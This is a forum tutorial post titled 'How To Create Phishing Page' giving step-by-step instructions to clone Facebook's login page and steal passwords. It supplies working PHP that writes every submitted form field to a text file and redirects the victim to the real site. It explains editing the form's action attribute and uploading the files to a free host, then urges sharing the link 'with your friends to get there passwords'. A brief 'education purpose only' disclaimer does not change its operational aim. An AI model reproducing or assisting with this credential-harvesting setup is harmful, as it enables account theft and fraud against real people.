You are not logged in.

#1 2015-04-07 07:07:07

husnain
User RankUser RankUser RankUser RankUser RankUser Rank
Administrator
From: Chichawatni,Pakistan
Registered: 2014-10-03
Posts: 8,129
Website

How To Create Phishing Page

How To Make Phishing Page


Step By Step:


NOTE:


This tutorial is for Education Purpose only don't misuse it,We will not hold any responsibility if it is being misused !
We have taken example of facebook to create a Phishing page but you can make any Social networking site phishing page by following exact steps as listed below!
......................

Step 1:


Create a Post.php from the given data:
......................

<?php
header ('Location:http://www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

......................

STEP 2:


Now go to www.facebook.com(Make sure that you are logged out!).Now Right click anywhere on the facebook home page and click on "view page source" from the menu. Alternatively you can get the source code of any site like gmail, facebook that as login form and create the phishing page by following other steps as it is.
Untitled-1.jpg
......................

STEP 3:


After clicking on "view page source" ,a new window will open with html coding in it.Press CTRL+A your keyboard to select the entire code and then press CTRL+C your keyboard to copy the code.
......................

STEP 4:


Open Notepad and paste the entire code in it,now scroll notepad to come at the top.Press CTRL+F of your keyboard and find "action=" without inverted comma's.there will be two "action=" you are interested in the first one.
......................

STEP 5:


Now Replace the highlighted text as shown in the picture given below with post.php.
Untitled-2.jpg
......................

STEP 6:


Go to File>Save as and save your file with the filename "index.html" without inverted comma.Press O.K if it shows up a a warning!
......................

STEP 7:


Go to www.my3gb.com or any free hosting site and create a account if you don't have account (It's FREE).After creating your acount on  www.my3gb.com click on File manager.
Untitled-3.jpg
......................

STEP 8:


After Clicking File manager now click on Upload file.Now upload  index.html and post.php.
Untitled-4.jpg
......................

STEP 9:


That's it you have successfully created a Facebook Phishing page, to view the page just click on the index file that you uploaded on the my3gb.com and copy the url from the address bar.
......................
Now you can share the url  with your friends to get there passwords.
......................

STEP 10:


You will get the password in the section file manager>upload file of my3gb.com under a file name usernames.txt.
To view the password just click on the file!


You cannot discover the new oceans unless you have the courage to lose the sight of the shore.

2015-04-07 07:07:07

Advertisement
Ads By Google

Re: How To Create Phishing Page



\n

Board footer